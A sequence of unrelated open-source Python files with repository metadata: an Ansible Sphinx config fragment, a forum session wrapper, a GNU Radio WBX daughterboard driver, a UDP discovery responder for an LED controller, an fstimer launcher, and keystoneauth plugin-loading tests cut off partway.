# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
autoclass_content = 'both'
# Note: Our strategy for intersphinx mappings is to have the upstream build location as the
# canonical source and then cached copies of the mapping stored locally in case someone is building
# when disconnected from the internet. We then have a script to update the cached copies.
#
# Because of that, each entry in this mapping should have this format:
# name: ('http://UPSTREAM_URL', (None, 'path/to/local/cache.inv'))
#
# The update script depends on this format so deviating from this (for instance, adding a third
# location for the mappning to live) will confuse it.
intersphinx_mapping = {'python': ('https://docs.python.org/2/', (None, '../python2.inv')),
'python3': ('https://docs.python.org/3/', (None, '../python3.inv')),
'jinja2': ('http://jinja.palletsprojects.com/', (None, '../jinja2.inv')),
'ansible_2_10': ('https://docs.ansible.com/ansible/2.10/', (None, '../ansible_2_10.inv')),
'ansible_2_9': ('https://docs.ansible.com/ansible/2.9/', (None, '../ansible_2_9.inv')),
'ansible_2_8': ('https://docs.ansible.com/ansible/2.8/', (None, '../ansible_2_8.inv')),
'ansible_2_7': ('https://docs.ansible.com/ansible/2.7/', (None, '../ansible_2_7.inv')),
'ansible_2_6': ('https://docs.ansible.com/ansible/2.6/', (None, '../ansible_2_6.inv')),
'ansible_2_5': ('https://docs.ansible.com/ansible/2.5/', (None, '../ansible_2_5.inv')),
}
# linckchecker settings
linkcheck_ignore = [
r'http://irc\.freenode\.net',
]
linkcheck_workers = 25
# linkcheck_anchors = False
|
dmsimard/ansible
|
docs/docsite/sphinx_conf/2.10_conf.py
|
Python
|
gpl-3.0
| 10,553
|
from sa_tools.base.magic import MagicMixin
from sa_tools.inbox import Inbox
from sa_tools.session import SASession
from sa_tools.index import Index
import os
import pickle
import sys
def py_ver() -> str:
return str(sys.version_info.major)
class APSession(object):
def __init__(self, username: str, passwd: str=None, save_session: bool=False, *args, **kwargs):
self.username = username
self.passwd = passwd
self._session_bak = \
'.' + username.replace(' ', '_') + py_ver() + '.bak'
self.session = self._get_session(save_session=save_session)
del passwd
del self.passwd
def _get_session(self, save_session: bool=True) -> SASession:
backup_exists = os.path.exists(self._session_bak)
# session = None
if backup_exists:
session = self._load_session()
else:
session = SASession(self.username, self.passwd)
if save_session:
self._save_session(session)
return session
def _load_session(self) -> None:
with open(self._session_bak, 'rb') as old_session:
print("Loading from backup: " + self._session_bak)
session = pickle.load(old_session)
return session
def _save_session(self, session: SASession) -> None:
with open(self._session_bak, 'wb') as session_file:
pickle.dump(session, session_file)
class AwfulPy(APSession, MagicMixin):
def __init__(self, username, *args, **kwargs):
super().__init__(username, *args, **kwargs)
self.index = Index(self.session)
self.inbox = Inbox(self.session)
self.name = "awful.py"
self.version = "v0.2014.08.24"
def __repr__(self):
info = '[' + self.name + ' ' + self.version + '] '
acct = 'Logged in as ' + self.username
login_time = ' on ' + self.session.login_time
return info + acct + login_time
|
thismachinechills/awful.py
|
awful.py
|
Python
|
gpl-3.0
| 1,950
|
#
# Copyright 2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import usrp1
import time,math
from usrpm import usrp_dbid
import db_base
import db_instantiator
from usrpm.usrp_fpga_regs import *
#debug_using_gui = True # Must be set to True or False
debug_using_gui = False # Must be set to True or False
#if debug_using_gui:
# import flexrf_debug_gui
# d'board i/o pin defs
# TX IO Pins
TX_POWER = (1 << 0) # TX Side Power
RX_TXN = (1 << 1) # T/R antenna switch for TX/RX port
# RX IO Pins
RX2_RX1N = (1 << 0) # antenna switch between RX2 and TX/RX port
RXENABLE = (1 << 1) # enables mixer
PLL_LOCK_DETECT = (1 << 2) # Muxout pin from PLL -- MUST BE INPUT
MReset = (1 << 3) # NB6L239 Master Reset, asserted low
SELA0 = (1 << 4) # NB6L239 SelA0
SELA1 = (1 << 5) # NB6L239 SelA1
SELB0 = (1 << 6) # NB6L239 SelB0
SELB1 = (1 << 7) # NB6L239 SelB1
PLL_ENABLE = (1 << 8) # CE Pin on PLL
AUX_SCLK = (1 << 9) # ALT SPI SCLK
AUX_SDO = (1 << 10) # ALT SPI SDO
AUX_SEN = (1 << 11) # ALT SPI SEN
SPI_ENABLE_TX_A = usrp1.SPI_ENABLE_TX_A
SPI_ENABLE_TX_B = usrp1.SPI_ENABLE_TX_B
SPI_ENABLE_RX_A = usrp1.SPI_ENABLE_RX_A
SPI_ENABLE_RX_B = usrp1.SPI_ENABLE_RX_B
"""
A few comments about the WBX boards:
They are half-duplex. I.e., transmit and receive are mutually exclusive.
There is a single LO for both the Tx and Rx sides.
The the shared control signals are hung off of the Rx side.
The shared io controls are duplexed onto the Rx side pins.
The wbx_high d'board always needs to be in 'auto_tr_mode'
"""
class wbx_base(db_base.db_base):
"""
Abstract base class for all wbx boards.
Derive board specific subclasses from db_wbx_base_{tx,rx}
"""
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.source_c
@param which: which side: 0 or 1 corresponding to side A or B respectively
@type which: int
"""
# sets _u _which _tx and _slot
db_base.db_base.__init__(self, usrp, which)
self.first = True
self.spi_format = usrp1.SPI_FMT_MSB | usrp1.SPI_FMT_HDR_0
# FIXME -- the write reg functions don't work with 0xffff for masks
self._rx_write_oe(int(PLL_ENABLE|MReset|SELA0|SELA1|SELB0|SELB1|RX2_RX1N|RXENABLE), 0x7fff)
self._rx_write_io((PLL_ENABLE|MReset|0|RXENABLE), (PLL_ENABLE|MReset|RX2_RX1N|RXENABLE))
self._tx_write_oe((TX_POWER|RX_TXN), 0x7fff)
self._tx_write_io((0|RX_TXN), (TX_POWER|RX_TXN)) # TX off, TR switch set to RX
self.spi_enable = (SPI_ENABLE_RX_A, SPI_ENABLE_RX_B)[which]
self.set_auto_tr(False)
#if debug_using_gui:
# title = "FlexRF Debug Rx"
# if self._tx:
# title = "FlexRF Debug Tx"
# self.gui = flexrf_debug_gui.flexrf_debug_gui(self, title)
# self.gui.Show(True)
def __del__(self):
#self._u.write_io(self._which, self.power_off, POWER_UP) # turn off power to board
#self._u._write_oe(self._which, 0, 0xffff) # turn off all outputs
self.set_auto_tr(False)
def _lock_detect(self):
"""
@returns: the value of the VCO/PLL lock detect bit.
@rtype: 0 or 1
"""
if self._rx_read_io() & PLL_LOCK_DETECT:
return True
else: # Give it a second chance
if self._rx_read_io() & PLL_LOCK_DETECT:
return True
else:
return False
# Both sides need access to the Rx pins.
# Write them directly, bypassing the convenience routines.
# (Sort of breaks modularity, but will work...)
def _tx_write_oe(self, value, mask):
return self._u._write_fpga_reg((FR_OE_0, FR_OE_2)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_write_oe(self, value, mask):
return self._u._write_fpga_reg((FR_OE_1, FR_OE_3)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _tx_write_io(self, value, mask):
return self._u._write_fpga_reg((FR_IO_0, FR_IO_2)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_write_io(self, value, mask):
return self._u._write_fpga_reg((FR_IO_1, FR_IO_3)[self._which],
((mask & 0xffff) << 16) | (value & 0xffff))
def _rx_read_io(self):
t = self._u._read_fpga_reg((FR_RB_IO_RX_A_IO_TX_A, FR_RB_IO_RX_B_IO_TX_B)[self._which])
return (t >> 16) & 0xffff
def _tx_read_io(self):
t = self._u._read_fpga_reg((FR_RB_IO_RX_A_IO_TX_A, FR_RB_IO_RX_B_IO_TX_B)[self._which])
return t & 0xffff
def _compute_regs(self, freq):
"""
Determine values of registers, along with actual freq.
@param freq: target frequency in Hz
@type freq: float
@returns: (R, N, func, init, actual_freq)
@rtype: tuple(int, int, int, int, float)
Override this in derived classes.
"""
raise NotImplementedError
def _refclk_freq(self):
return float(self._u.fpga_master_clock_freq())/self._refclk_divisor()
def _refclk_divisor(self):
"""
Return value to stick in REFCLK_DIVISOR register
"""
return 1
# ----------------------------------------------------------------
def set_freq(self, freq):
"""
@returns (ok, actual_baseband_freq) where:
ok is True or False and indicates success or failure,
actual_baseband_freq is the RF frequency that corresponds to DC in the IF.
"""
raise NotImplementedError
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
"""
raise NotImplementedError
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
raise NotImplementedError
def _set_pga(self, pga_gain):
if(self._which == 0):
self._u.set_pga (0, pga_gain)
self._u.set_pga (1, pga_gain)
else:
self._u.set_pga (2, pga_gain)
self._u.set_pga (3, pga_gain)
def is_quadrature(self):
"""
Return True if this board requires both I & Q analog channels.
This bit of info is useful when setting up the USRP Rx mux register.
"""
return True
# ----------------------------------------------------------------
class wbx_base_tx(wbx_base):
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.sink_c
@param which: 0 or 1 corresponding to side TX_A or TX_B respectively.
"""
wbx_base.__init__(self, usrp, which)
# power up the transmit side, NO -- but set antenna to receive
self._u.write_io(self._which, (TX_POWER), (TX_POWER|RX_TXN))
self._lo_offset = 0e6
# Gain is not set by the PGA, but the PGA must be set at max gain in the TX
return self._set_pga(self._u.pga_max())
def __del__(self):
# Power down and leave the T/R switch in the R position
self._u.write_io(self._which, (RX_TXN), (TX_POWER|RX_TXN))
wbx_base.__del__(self)
def set_auto_tr(self, on):
if on:
self.set_atr_mask (RX_TXN)
self.set_atr_txval(0)
self.set_atr_rxval(RX_TXN)
else:
self.set_atr_mask (0)
self.set_atr_txval(0)
self.set_atr_rxval(0)
def set_enable(self, on):
"""
Enable transmitter if on is True
"""
if on:
v = 0
else:
v = RX_TXN
self._u.write_io(self._which, v, RX_TXN)
def set_lo_offset(self, offset):
"""
Set amount by which LO is offset from requested tuning frequency.
@param offset: offset in Hz
"""
self._lo_offset = offset
def lo_offset(self):
"""
Get amount by which LO is offset from requested tuning frequency.
@returns Offset in Hz
"""
return self._lo_offset
class wbx_base_rx(wbx_base):
def __init__(self, usrp, which):
"""
@param usrp: instance of usrp.source_c
@param which: 0 or 1 corresponding to side RX_A or RX_B respectively.
"""
wbx_base.__init__(self, usrp, which)
# set up for RX on TX/RX port
self.select_rx_antenna('TX/RX')
self.bypass_adc_buffers(True)
self._lo_offset = -4e6
def __del__(self):
# Power down
self._u.write_io(self._which, 0, (RXENABLE))
wbx_base.__del__(self)
def set_auto_tr(self, on):
if on:
self.set_atr_mask (ENABLE)
self.set_atr_txval( 0)
self.set_atr_rxval(ENABLE)
else:
self.set_atr_mask (0)
self.set_atr_txval(0)
self.set_atr_rxval(0)
def select_rx_antenna(self, which_antenna):
"""
Specify which antenna port to use for reception.
@param which_antenna: either 'TX/RX' or 'RX2'
"""
if which_antenna in (0, 'TX/RX'):
self._u.write_io(self._which, 0, RX2_RX1N)
elif which_antenna in (1, 'RX2'):
self._u.write_io(self._which, RX2_RX1N, RX2_RX1N)
else:
raise ValueError, "which_antenna must be either 'TX/RX' or 'RX2'"
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
maxgain = self.gain_range()[1] - self._u.pga_max()
mingain = self.gain_range()[0]
if gain > maxgain:
pga_gain = gain-maxgain
assert pga_gain <= self._u.pga_max()
agc_gain = maxgain
else:
pga_gain = 0
agc_gain = gain
V_maxgain = .2
V_mingain = 1.2
V_fullscale = 3.3
dac_value = (agc_gain*(V_maxgain-V_mingain)/(maxgain-mingain) + V_mingain)*4096/V_fullscale
assert dac_value>=0 and dac_value<4096
return self._u.write_aux_dac(self._which, 0, int(dac_value)) and \
self._set_pga(int(pga_gain))
def set_lo_offset(self, offset):
"""
Set amount by which LO is offset from requested tuning frequency.
@param offset: offset in Hz
"""
self._lo_offset = offset
def lo_offset(self):
"""
Get amount by which LO is offset from requested tuning frequency.
@returns Offset in Hz
"""
return self._lo_offset
def i_and_q_swapped(self):
"""
Return True if this is a quadrature device and ADC 0 is Q.
"""
return True
# ----------------------------------------------------------------
class _ADF410X_common(object):
def __init__(self):
# R-Register Common Values
self.R_RSV = 0 # bits 23,22,21
self.LDP = 1 # bit 20 Lock detect in 5 cycles
self.TEST = 0 # bit 19,18 Normal
self.ABP = 0 # bit 17,16 2.9ns
# N-Register Common Values
self.N_RSV = 0 # 23,22
self.CP_GAIN = 0 # 21
# Function Register Common Values
self.P = 0 # bits 23,22 0 = 8/9, 1 = 16/17, 2 = 32/33, 3 = 64/65
self.PD2 = 0 # bit 21 Normal operation
self.CP2 = 7 # bits 20,19,18 CP Gain = 5mA
self.CP1 = 7 # bits 17,16,15 CP Gain = 5mA
self.TC = 0 # bits 14-11 PFD Timeout
self.FL = 0 # bit 10,9 Fastlock Disabled
self.CP3S = 0 # bit 8 CP Enabled
self.PDP = 0 # bit 7 Phase detector polarity, Positive=1
self.MUXOUT = 1 # bits 6:4 Digital Lock Detect
self.PD1 = 0 # bit 3 Normal operation
self.CR = 0 # bit 2 Normal operation
def _compute_regs(self, freq):
"""
Determine values of R, control, and N registers, along with actual freq.
@param freq: target frequency in Hz
@type freq: float
@returns: (R, N, control, actual_freq)
@rtype: tuple(int, int, int, float)
"""
# Band-specific N-Register Values
phdet_freq = self._refclk_freq()/self.R_DIV
print "phdet_freq = %f" % (phdet_freq,)
desired_n = round(freq*self.freq_mult/phdet_freq)
print "desired_n %f" % (desired_n,)
actual_freq = desired_n * phdet_freq
print "actual freq %f" % (actual_freq,)
B = math.floor(desired_n/self._prescaler())
A = desired_n - self._prescaler()*B
print "A %d B %d" % (A,B)
self.B_DIV = int(B) # bits 20:8
self.A_DIV = int(A) # bit 6:2
#assert self.B_DIV >= self.A_DIV
if self.B_DIV < self.A_DIV:
return (0,0,0,0)
R = (self.R_RSV<<21) | (self.LDP<<20) | (self.TEST<<18) | \
(self.ABP<<16) | (self.R_DIV<<2)
N = (self.N_RSV<<22) | (self.CP_GAIN<<21) | (self.B_DIV<<8) | (self.A_DIV<<2)
control = (self.P<<22) | (self.PD2<<21) | (self.CP2<<18) | (self.CP1<<15) | \
(self.TC<<11) | (self.FL<<9) | (self.CP3S<<8) | (self.PDP<<7) | \
(self.MUXOUT<<4) | (self.PD1<<3) | (self.CR<<2)
return (R,N,control,actual_freq/self.freq_mult)
def _write_all(self, R, N, control):
"""
Write all PLL registers:
R counter latch,
N counter latch,
Function latch,
Initialization latch
Adds 10ms delay between writing control and N if this is first call.
This is the required power-up sequence.
@param R: 24-bit R counter latch
@type R: int
@param N: 24-bit N counter latch
@type N: int
@param control: 24-bit control latch
@type control: int
"""
self._write_R(R)
self._write_func(control)
self._write_init(control)
if self.first:
time.sleep(0.010)
self.first = False
self._write_N(N)
def _write_R(self, R):
self._write_it((R & ~0x3) | 0)
def _write_N(self, N):
self._write_it((N & ~0x3) | 1)
def _write_func(self, func):
self._write_it((func & ~0x3) | 2)
def _write_init(self, init):
self._write_it((init & ~0x3) | 3)
def _write_it(self, v):
s = ''.join((chr((v >> 16) & 0xff),
chr((v >> 8) & 0xff),
chr(v & 0xff)))
self._u._write_spi(0, self.spi_enable, self.spi_format, s)
def _prescaler(self):
if self.P == 0:
return 8
elif self.P == 1:
return 16
elif self.P == 2:
return 32
elif self.P == 3:
return 64
else:
raise ValueError, "Prescaler out of range"
#----------------------------------------------------------------------
class _lo_common(_ADF410X_common):
def __init__(self):
_ADF410X_common.__init__(self)
# Band-specific R-Register Values
self.R_DIV = 4 # bits 15:2
# Band-specific C-Register values
self.P = 0 # bits 23,22 0 = Div by 8/9
self.CP2 = 7 # bits 19:17
self.CP1 = 7 # bits 16:14
# Band specifc N-Register Values
self.DIVSEL = 0 # bit 23
self.DIV2 = 0 # bit 22
self.CPGAIN = 0 # bit 21
self.freq_mult = 1
self.div = 1
self.aux_div = 2
def freq_range(self): # FIXME
return (50e6, 1000e6, 16e6)
def set_divider(self, main_or_aux, divisor):
if main_or_aux not in (0, 'main', 1, 'aux'):
raise ValueError, "main_or_aux must be 'main' or 'aux'"
if main_or_aux in (0, 'main'):
if divisor not in (1,2,4,8):
raise ValueError, "Main Divider Must be 1, 2, 4, or 8"
for (div,val) in ((1,0),(2,1),(4,2),(8,3)):
if(div == divisor):
self.main_div = val
else:
if divisor not in (2,4,8,16):
raise ValueError, "Aux Divider Must be 2, 4, 8 or 16"
for (div,val) in ((2,0),(4,1),(8,2),(16,3)):
if(div == divisor):
self.aux_div = val
vala = self.main_div*SELA0
valb = self.aux_div*SELB0
mask = SELA0|SELA1|SELB0|SELB1
self._rx_write_io(((self.main_div*SELA0) | (self.aux_div*SELB0)),
(SELA0|SELA1|SELB0|SELB1))
def set_freq(self, freq):
#freq += self._lo_offset
if(freq < 20e6 or freq > 1200e6):
raise ValueError, "Requested frequency out of range"
div = 1
lo_freq = freq * 2
while lo_freq < 1e9 and div < 8:
div = div * 2
lo_freq = lo_freq * 2
print "For RF freq of %f, we set DIV=%d and LO Freq=%f" % (freq, div, lo_freq)
self.set_divider('main', div)
self.set_divider('aux', div*2)
R, N, control, actual_freq = self._compute_regs(lo_freq)
print "R %d N %d control %d actual freq %f" % (R,N,control,actual_freq)
if R==0:
return(False,0)
self._write_all(R, N, control)
return (self._lock_detect(), actual_freq/div/2)
#------------------------------------------------------------
class db_wbx_lo_tx(_lo_common, wbx_base_tx):
def __init__(self, usrp, which):
wbx_base_tx.__init__(self, usrp, which)
_lo_common.__init__(self)
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
Gain is controlled by a VGA in the output amplifier, not the PGA
"""
return (-56, 0, 0.1)
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
maxgain = self.gain_range()[1]
mingain = self.gain_range()[0]
if gain > maxgain:
txvga_gain = maxgain
elif gain < mingain:
txvga_gain = mingain
else:
txvga_gain = gain
V_maxgain = 1.4
V_mingain = 0.1
V_fullscale = 3.3
dac_value = ((txvga_gain-mingain)*(V_maxgain-V_mingain)/(maxgain-mingain) + V_mingain)*4096/V_fullscale
assert dac_value>=0 and dac_value<4096
print "DAC value %d" % (dac_value,)
return self._u.write_aux_dac(self._which, 1, int(dac_value))
class db_wbx_lo_rx(_lo_common, wbx_base_rx):
def __init__(self, usrp, which):
wbx_base_rx.__init__(self, usrp, which)
_lo_common.__init__(self)
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
"""
return (self._u.pga_min(), self._u.pga_max() + 45, 0.05)
#------------------------------------------------------------
# hook these daughterboard classes into the auto-instantiation framework
db_instantiator.add(usrp_dbid.WBX_LO_TX, lambda usrp, which : (db_wbx_lo_tx(usrp, which),))
db_instantiator.add(usrp_dbid.WBX_LO_RX, lambda usrp, which : (db_wbx_lo_rx(usrp, which),))
|
trnewman/VT-USRP-daughterboard-drivers_python
|
gr-usrp/src/db_wbx.py
|
Python
|
gpl-3.0
| 20,483
|
#!/usr/bin/env python
import socket
# Set admin server settings
UDP_IP = '' # Leave empty for Broadcast support
ADMIN_PORT = 48899
# Local settings of your Raspberry Pi, used for app discovery
INT_IP = '10.0.1.61'
INT_MAC = '111a02bf232b'
# Code Starts Here #
# Create UDP socket, bind to it
adminsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
adminsock.bind((UDP_IP, ADMIN_PORT))
# Loop forever
while True:
admindata, adminaddr = adminsock.recvfrom(64) # buffer size is 64 bytes
# Did we get a message?
if admindata is not None:
# print("admin command: ", str(admindata)) # Debugging
# If the client app is syncing to a unit
if str(admindata).find("Link_Wi-Fi") != -1:
RETURN = INT_IP + ',' + INT_MAC + ',' # Return our IP/MAC
# print("admin return: ", RETURN) # Debugging
adminsock.sendto(bytes(RETURN, "utf-8"),adminaddr) # Send Response
else:
adminsock.sendto(bytes('+ok', "utf-8"),adminaddr) # Send OK for each packet we get
else:
break
|
ep1cman/RFLED-Server
|
source/admin.py
|
Python
|
gpl-3.0
| 1,061
|
#!/usr/bin/env python3
import fstimer.fslogger
import fstimer.timer
from gi.repository import Gtk
def main():
pytimer = fstimer.timer.PyTimer()
Gtk.main()
if __name__ == '__main__':
main()
|
bletham/fstimer
|
fstimer.py
|
Python
|
gpl-3.0
| 206
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import uuid
from keystoneauth1 import exceptions
from keystoneauth1 import loading
from keystoneauth1.tests.unit.loading import utils
class V3PasswordTests(utils.TestCase):
def setUp(self):
super(V3PasswordTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3password')
return loader.load_from_options(**kwargs)
def test_basic(self):
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
password = uuid.uuid4().hex
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
p = self.create(username=username,
user_domain_id=user_domain_id,
project_name=project_name,
project_domain_id=project_domain_id,
password=password)
pw_method = p.auth_methods[0]
self.assertEqual(username, pw_method.username)
self.assertEqual(user_domain_id, pw_method.user_domain_id)
self.assertEqual(password, pw_method.password)
self.assertEqual(project_name, p.project_name)
self.assertEqual(project_domain_id, p.project_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
def test_without_project_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
project_name=uuid.uuid4().hex)
class TOTPTests(utils.TestCase):
def setUp(self):
super(TOTPTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3totp')
return loader.load_from_options(**kwargs)
def test_basic(self):
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
# passcode is 6 digits
passcode = ''.join(str(random.randint(0, 9)) for x in range(6))
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
p = self.create(username=username,
user_domain_id=user_domain_id,
project_name=project_name,
project_domain_id=project_domain_id,
passcode=passcode)
totp_method = p.auth_methods[0]
self.assertEqual(username, totp_method.username)
self.assertEqual(user_domain_id, totp_method.user_domain_id)
self.assertEqual(passcode, totp_method.passcode)
self.assertEqual(project_name, p.project_name)
self.assertEqual(project_domain_id, p.project_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
passcode=uuid.uuid4().hex)
def test_without_project_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
passcode=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
project_name=uuid.uuid4().hex)
class OpenIDConnectBaseTests(object):
plugin_name = None
def setUp(self):
super(OpenIDConnectBaseTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader(self.plugin_name)
return loader.load_from_options(**kwargs)
def test_base_options_are_there(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['client-id', 'client-secret', 'access-token-endpoint',
'access-token-type', 'openid-scope',
'discovery-endpoint']).issubset(
set([o.name for o in options]))
)
# openid-scope gets renamed into "scope"
self.assertIn('scope', [o.dest for o in options])
class OpenIDConnectClientCredentialsTests(OpenIDConnectBaseTests,
utils.TestCase):
plugin_name = "v3oidcclientcredentials"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['openid-scope']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
scope = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
scope = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectPasswordTests(OpenIDConnectBaseTests, utils.TestCase):
plugin_name = "v3oidcpassword"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['username', 'password', 'openid-scope']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
username = uuid.uuid4().hex
password = uuid.uuid4().hex
scope = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
scope = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(username=username,
password=password,
identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(username, oidc.username)
self.assertEqual(password, oidc.password)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectAuthCodeTests(OpenIDConnectBaseTests, utils.TestCase):
plugin_name = "v3oidcauthcode"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['redirect-uri', 'code']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
redirect_uri = uuid.uuid4().hex
authorization_code = uuid.uuid4().hex
scope = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(code=authorization_code,
redirect_uri=redirect_uri,
identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(redirect_uri, oidc.redirect_uri)
self.assertEqual(authorization_code, oidc.code)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectAccessToken(utils.TestCase):
plugin_name = "v3oidcaccesstoken"
def setUp(self):
super(OpenIDConnectAccessToken, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader(self.plugin_name)
return loader.load_from_options(**kwargs)
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['access-token']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
oidc = self.create(access_token=access_token,
identity_provider=identity_provider,
protocol=protocol)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token, oidc.access_token)
class V3TokenlessAuthTests(utils.TestCase):
def setUp(self):
super(V3TokenlessAuthTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3tokenlessauth')
return loader.load_from_options(**kwargs)
def test_basic(self):
domain_id = uuid.uuid4().hex
domain_name = uuid.uuid4().hex
project_id = uuid.uuid4().hex
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
project_domain_name = uuid.uuid4().hex
tla = self.create(domain_id=domain_id,
domain_name=domain_name,
project_id=project_id,
project_name=project_name,
project_domain_id=project_domain_id,
project_domain_name=project_domain_name)
self.assertEqual(domain_id, tla.domain_id)
self.assertEqual(domain_name, tla.domain_name)
self.assertEqual(project_id, tla.project_id)
self.assertEqual(project_name, tla.project_name)
self.assertEqual(project_domain_id, tla.project_domain_id)
self.assertEqual(project_domain_name, tla.project_domain_name)
def test_missing_parameters(self):
self.assertRaises(exceptions.OptionError,
self.create,
domain_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
domain_name=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_name=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_name=None)
# only when a project_name is provided, project_domain_id will
# be use to uniquely identify the project. It's an invalid
# option when it's just by itself.
self.assertRaises(exceptions.OptionError,
self.create,
